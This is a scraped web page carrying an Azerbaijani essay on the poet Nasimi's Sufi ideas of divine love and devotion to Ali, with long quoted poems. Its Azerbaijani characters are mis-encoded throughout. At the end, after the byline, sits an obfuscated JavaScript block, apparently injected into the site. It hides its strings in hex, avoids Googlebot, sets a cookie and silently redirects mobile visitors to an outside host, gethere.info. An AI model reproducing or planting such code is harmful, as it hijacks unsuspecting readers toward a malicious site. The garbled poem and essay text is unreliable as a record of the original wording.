NE�simi A�lahiyE� qovuAYmaq A?A�A?n yeganE� yolu ixlasdan doAYan eAYqdE� gA�rA?r. Allah insanA� eAYqlE� yaratdA�AYA� kimi insan da yalnA�z A�z TanrA�sA�na eAYqlE� A�atar. Bu eAYq isE� nE� cE�hE�nnE�min qorxusundan ibadE�t edE�n zahiddE� olar, nE� dE� cE�nnE�ti qazanmaq A?A�A?n ibadE�ti ticarE�t hesab edE�n abiddE� olar. Zahid dE�, abid dE� mE�rifE�t A?A�A?n A�alA�AYmalA�dA�r, A�A?nki AllahA� tanA�maAYA�n yolu mE�rifE�tE� A�atmaqdadA�r. NE�simiyE� gA�rE� E�sl dindar nE� zahid mE�rhE�lE�sindE�, nE� dE� abid mE�rhE�lE�sindE� iliAYib qalmamalA�dA�r. ??sl dindar daima seyri-sA?luk yolunda olmalA�dA�r. A�A?nki arif olmaq istE�yE�n AllahA�nA� tanA�ya bilE�r, arif olmaq istE�yE�n salikliyini davam etdirE� bilE�r. Zahidin ibadE�tinin E�sasA�nda qorxu, abidin ibadE�tinin E�sasA�nda cE�nnE�ti qazanmaq durursa, fE�qE�t arif bA?tA?n etdiyi E�mE�llE�rini A�lahiyE� olan eAYqinE� gA�rE� edE�r. AriflE�r A?A�A?n cE�nnE�t mA?kafat yox Allaha qovuAYmaq A?A�A?n bir bE�hanE�dir vE� onlar cE�nnE�ti bu sE�bE�bdE�n qazanmaq istE�yE�rlE�r.

KA�nlA?mA?n AYE�hrini A�A?n kim eylE�di yE�AYmaye eAYq,
SaldA� canA�m mA?lkinE� AYur vE� AYE�r vE� qovAYaye eAYq.
A�axdA�mA� sirrim alE�mE�, E�srarA�mA� faAY eylE�di,
HalA�ma hE�mdE�m olandan dA?nyada sevdaye eAYq.
QalmadA� namus vE� nam eAYq iA�indE� zE�rrE�cE�,
QoymuAYam namus vE� namA�, olmuAYam rA?svaye eAYq.
Nitq imiAY alE�mdE� mA�vcud, eAYq imiAY qaime mE�qam,
BizE� bildirdi E�zE�ldE�n rE�hbE�re mA�vlaye eAYq.
SE�n humaye lamE�kansan, kE�ndi A�zA?ndE�n bixE�bE�r,
GE�lmE�din ta kim gA�rE�sE�n mE�nzile E�laye eAYq.
A�A�x qE�fE�sdE�n, gE�l-gE�l, ey bA?lbA?l, gA?lA?stan seyrin et,
Bas qE�dE�m meydane eAYqE�, gA�rE�sE�n maE�vaye eAYq,
EAYqlE� hE�rdE�m NE�simi seyr edE�rsE�n kuhe Qaf,
SE�nsE�n E�vvE�l ali mE�qamda AYE�hpE�re E�AYnaye eAYq.

NE�simiyE� gA�rE� ilahi eAYqin yolu ??hli-BeytE� olan eAYqdE�n qaynaqlanA�r. Kim bu AYE�xslE�ri tanA�mazsa E�sl eAYqin nE�dE�n ibarE�t olduAYunu bilmE�z. QE�lbi HE�zrE�t ??li eAYqi ilE� yanmayan AYE�xs ilahi eAYqin nE� olduAYunu bilmE�z.

EAYq E�lindE�n yandA� canA�m, ya ??li sE�ndE�n mE�dE�d.
ME�n qE�ribe binE�vayam, ya ??li sE�ndE�n mE�dE�d.
SE�n mE�nE� lA?tf vE� kE�rE�mdE�n dE�rdimE� bir A�arE� qA�l,
Azah sE�nsE�n mE�n gE�dayE�m, ya ??li sE�ndE�n mE�dE�d.
HE�q TE�ala A�z nurundan xoAY yaratmA�AY AYahA�m,
QA?drE�te sirri xudasan, ya ??li sE�ndE�n mE�dE�d.
Kim ME�hE�mmE�di ??lidE�n ayrur, lE�nE�t ona,
LE�hmikE� lE�hmi deyilmi, ya ??li sE�ndE�n mE�dE�d.
HE�m XE�dicE� FatimE� ibni bE�ni binti ??sE�d,
ME�dE�ne dA?rre hE�qiqE�t, ya ??li sE�ndE�n mE�dE�d.
BE�ndeye xE�lqe HE�sE�n oldum E�zE�ldE� ta E�bE�d,
Nure eyne Mustafasan, ya ??li sE�ndE�n mE�dE�d.
HE�r RE�cE�b ayA�nda gA�rdA?m neA�E� mA�cA?z gA�stE�rir,
Azah HA?seynin sE�duqindE�, ya ??li sE�ndE�n mE�dE�d.
CA?mlE� A�vlaye dini sE�ndE�n zA?hur oldu tamam,
AdA� ZeynE�labidindA?r, ya ??li sE�ndE�n mE�dE�d.
Baqir vE� Sadiq yolunda A�yA?ndA?m mE�n canimi,
Musa KazA�m inayE�t, ya ??li sE�ndE�n mE�dE�d.
BE�r tE�vafe kE�bE� Azahe Xorasan eylE�dim,
YetmiAY iki hE�cce ??kbE�r, ya ??li sE�ndE�n mE�dE�d.
HE�m TE�qi vE� hE�m NE�qi vE� varise dine NE�bi,
DA�vlE�te Ali-E�basan, ya ??li sE�ndE�n mE�dE�d.
Ol A�mam ??sgE�ridir yE�ni ki, xE�lqe HE�sE�n,
KA�nlA?m onda AYad oldu, ya ??li sE�ndE�n mE�dE�d.
Ol ME�hE�mmE�d Mehdi Sahibe ZE�man ilE� zA?hur,
AlE�mi kE�ffar tutdu, ya ??li sE�ndE�n mE�dE�d.
SE�d hezaran lE�nE�t dadar davE�r hE�r zaman,
BE�r Yezid toxme mE�rdan, ya ??li sE�ndE�n mE�dE�d.
Ey NE�simiye AYekE�ste, HE�qdE�n istE�rsE�n nicat,
Coreye tA�vhid meyindE�n, ya ??li sE�ndE�n mE�dE�d.

A�ndiki dA�vrdE� bE�zi bE�dxah insanlar A�mam HA?seyn qiyamA�nA� A�zA?ndE� az da olsa ehtiva edE�n ME�hE�rrE�mlik mE�rasiminin ziddinE� A�A�xA�rlarsa, 700 il bundan qabaq NE�simi aAYaAYA�dakA� misralarla bizE� dE�rs qoymuAYdur.

Ey gA?nE�AY, tire olub dA?AYmE�din yerE�,
Ol matE�m A?zrE� mehrilE� dE�yyar, ya HA?seyn…..
AAYlamaq bu gA?n, bu matE�mE� canlar fE�da etmE�k
Ol matE�m A?zrE� mehrilE� dE�yyar, ya HA?seyn…..

BE�zi dA�rnaqarasA� mA?tE�fE�kkirlE�r ME�hE�rrE�mlik mE�rasiminin bizE� qonAYu A�slam A�lkE�lE�rindE�n sA�rA�ndA�AYA�nA� qeyd edir. Halbuki klassik AzE�rbaycan AYairlE�rindE�n olan XE�tai, FA?zuli, Azirvani, Sabir, hE�mA�inin hE�mmA?asirlE�rimizdE�n olan AzE�hriyar bu mE�rasimin qeyd olunmasA�nA� bizE� tA�vsiyE� etmiAYlE�r.
NE�simi AYeirlE�rindE� mE�nalarA� A�atdA�rmaq A?A�A?n E�bcE�d E�lifbasA�ndan baAYqa, rE�qE�mlE�rdE�n dE� A�ox gA�zE�l istifadE� etmiAYdir.

Arif-i La-mE�kan otuz ikidir,
Sahib-i cism-A? can otuz ikidir.
AA� kA�nA?l gA�zA?nA? vE� A?zA?nE� bax,
Kim yaxA�n bi-gA?man otuz ikidir.
A?zA?n A?mmA?l kitabA�n ayE�tA�,
NE� sayA�rsan, hE�mE�n otuz ikidir.
SidrE�ttA?l-mantE�ha anA�n E�qsamA�,
NE� sayarsan, E�yan otuz ikidir.
VahyA? ilham, ya NE�biyyA? vE�lA�,
AAYikaru nihan otuz ikidir.
A�ndi isE� gA�tA?rdA? AYirkA? nifaq,
Bil ki sahib-zaman otuz ikidir.
Der NE�simi ki, surE�tA? mE�na,
E�rh ilE� hE�m bE�yan otuz ikidir.
***
YeddidA?r, dA�rd yeddidE�n bir yeddidA?r,
YA?z iyirmi dA�rd yenE� A?A� yeddidA?r,
Evi bir, bacE�si yeddi, bab A?A�,
??hli Beyt ilE� A�zA? on yeddidA?r.
***
Ol nE�dir kim hay vE� huy altA�dA�r,
Kim gA�rA?bdA?r bir sE�dE�fdE� altA�dA�r,
Siyo dodan yuxarA� hiA� nE�snE� yox,
FA�vq baAYA�n, tE�ht ayaAYA�n altA�dA�r.
***
Yeddi yerdE� otuz ikidA?r A?zA?n,
Otuz iki gA�stE�rE�r iki gA�zA?n,
QamE�tin sE�ksE�n sE�kkiz edE�r bE�yan,
YetmiAY iki bildirE�r nitqe sA�zA?n.

Sonda isE� NE�siminin E�n gA�zE�l fE�lsE�fi AYeirlE�rindE�n biri ilE� tanA�AY olaq.

A�nsan bE�AYE�rsE�n

ME�n mA?lke cE�han, cE�han mE�nE�m, mE�n. A� A� A� A� A�ME�n E�rAY vE� mE�kan mE�kan mE�nE�m,mE�n.
ME�n E�rAYilE� fE�rAYu kafu nunE�m. A� A� A� A� A� A� A� A� A� A� A�ME�n AYE�rhu bE�yan bE�yan mE�nE�m, mE�n.
ME�n kA�vn vE� mE�kanu kunfE�kanE�m. A� A� A� A� A� A� A�BilgE�l ki, neAYan neAYan mE�nE�m, mE�n.
ME�n surE�te mE�nidE� hE�qqE�m, hE�qq. A� A� A� A� A� A� A�ME�n hE�qqE� E�yan E�yan mE�nE�m, mE�n.
Bir gA�vhE�rE�m vE� qE�dim E�zE�ldE� A� A� A� A� A� A� A� A� A�A� Ey gA�vhE�re kan, kan mE�nE�m, mE�n.
ME�n atE�AYe nur, eAYqe hE�qqE�m. A� A� A� A� A� A� A� A� A� Musaya zE�ban zE�ban mE�nE�m, mE�n.
ME�n cA?mlE� cE�han, kainatam. A� A� A� A� A� A� A� A� A� ME�n dE�hre zaman zaman mE�nE�m, mE�n.
ME�n ayE�te mA?sE�hhE�f vE� kitabE�m. A� A� A� A� A� A�A� Ey nitqE� dE�han dE�han mE�nE�m, mE�n.
ME�n qA�vsilE� hE�m kE�man vE� tirE�m. A� A� A� A� A� A� Ey tir vE� kE�man kE�man mE�nE�m, mE�n.
CE�mAYide zE�mane alE�m oldum. A� A� A� A� A� A� A� A� A�CE�mAYide zE�man zE�man mE�nE�m, mE�n.
ME�n nE�qAYo xE�yalo xE�tto xalE�m. A� A� A� A� A� A� A� A� ME�n hE�rfo lisan lisan mE�nE�m, mE�n.
ME�n gE�nco nE�han, kA?nto kE�nzE�m. A� A� A� A� A� A� ME�n gE�nce nE�han nE�han mE�nE�m, mE�n.
ME�n zato sefate kunfE�kanE�m. A� A� A� A� A� A� A� A� ME�n ruh ilE� cane cE�han mE�nE�m, mE�n.
ME�n kafirE� mA�vte mA?sibE�t oldum. A� A� A� A� A�MA�minE� iman iman mE�nE�m, mE�n.
ME�n cE�nnE�t vE� Abe KA�vsE�r oldum. A� A� A� A� A� Ey sE�hne cE�nan cE�nan mE�nE�m, mE�n.
ME�n bE�hre mA?hit vE� kE�ranE�m. A� A� A� A� A� A� A� A� Ey bE�hre kE�ran kE�ran mE�nE�m, mE�n
ME�n sirre tA�vhidE�m, hE�disE�m. A� A� A� A� A� A� A� A� HE�m qeybo gA?man gA?man mE�nE�m, mE�n.
A�nsane bE�AYE�rsE�n, ey NE�simi. A� A� A� A� A� A� A� A� A� HE�qdir ki, hE�man hE�man mE�nE�m, mE�n.

VA?sal HE�tE�mov. ( NE�simiAYA?nas ) a�?Kamillika�? elmi araAYdA�rmalar mE�rkE�zi (birlik.az)

xacmazmescidi.com

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Scroll To Top